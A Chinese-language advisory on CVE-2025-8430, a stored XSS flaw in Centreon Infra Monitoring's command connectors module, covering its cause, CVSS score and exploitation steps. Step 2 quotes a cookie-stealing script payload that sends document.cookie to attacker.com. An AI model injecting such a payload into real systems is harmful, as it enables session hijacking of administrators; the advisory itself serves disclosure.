CVE-2025-8430CVE-2025-8430是Centreon Infra Monitoring平台命令连接器(Commands Connectors)配置模块中存在的一个存储型跨站脚本(Stored XSS)漏洞。该漏洞源于Web页面生成过程中对用户输入未能进行充分的中和化处理(Improper Neutralization of Input During Web Page Generation),属于CWE-79类漏洞。Centreon是一款广泛使用的开源IT基础设施监控平台,被大量企业用于监控网络设备、服务器和应用程序的运行状态。该漏洞允许具有提升权限的用户在命令连接器配置模块中注入恶意的JavaScript脚本或HTML代码,这些恶意内容将被持久化存储在服务端数据库中。当其他用户(包括管理员)访问包含恶意内容的页面时,存储的恶意脚本将在其浏览器上下文中自动执行,从而窃取敏感信息(如会话Cookie、认证令牌)或执行未授权操作。由于该漏洞影响范围集中在机密性维度(CVSS中C:H),攻击者可利用此漏洞获取高权限用户的会话信息,进而可能导致权限提升或敏感监控数据泄露。该漏洞的CVSS 3.1评分为6.8,属于中危级别,攻击向量为网络利用,需要高权限认证,无需用户交互即可触发。Centreon官方已在最新版本中修复该问题,并发布了安全公告。
该漏洞的核心问题在于Centreon Infra Monitoring命令连接器配置模块未对用户提交的输入数据进行充分的过滤和转义处理。具体而言,当具有高权限的用户(如管理员或配置管理员)在配置命令连接器(Commands Connectors)相关参数时,输入的恶意JavaScript代码或HTML标签未被正确中和化(HTML实体编码),而是直接存储到后端数据库中。由于Centreon Web前端在渲染这些配置数据时直接输出原始内容而未进行适当的输出编码,导致存储型XSS漏洞的产生。攻击利用过程如下:1)攻击者首先需要获取具有提升权限的Centreon账户(PR:H要求);2)登录后导航至命令连接器配置模块,在相关字段(如连接器名称、描述、命令路径等)中注入恶意JavaScript payload,例如`<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>`;3)恶意payload被持久化存储到数据库;4)当其他用户(尤其是更高权限的管理员)查看相关配置页面时,浏览器自动执行注入的脚本;5)攻击者可窃取受害者的会话Cookie、认证令牌,或在受害者权限上下文中执行任意操作。由于CVSS向量中包含S:C(Scope Changed),表明漏洞的影响范围会跨越安全边界,攻击者可利用窃取的权限访问超出预期范围的数据。该漏洞的CVSS评分为6.8,反映了虽然利用需要高权限,但其影响范围广且对机密性危害严重。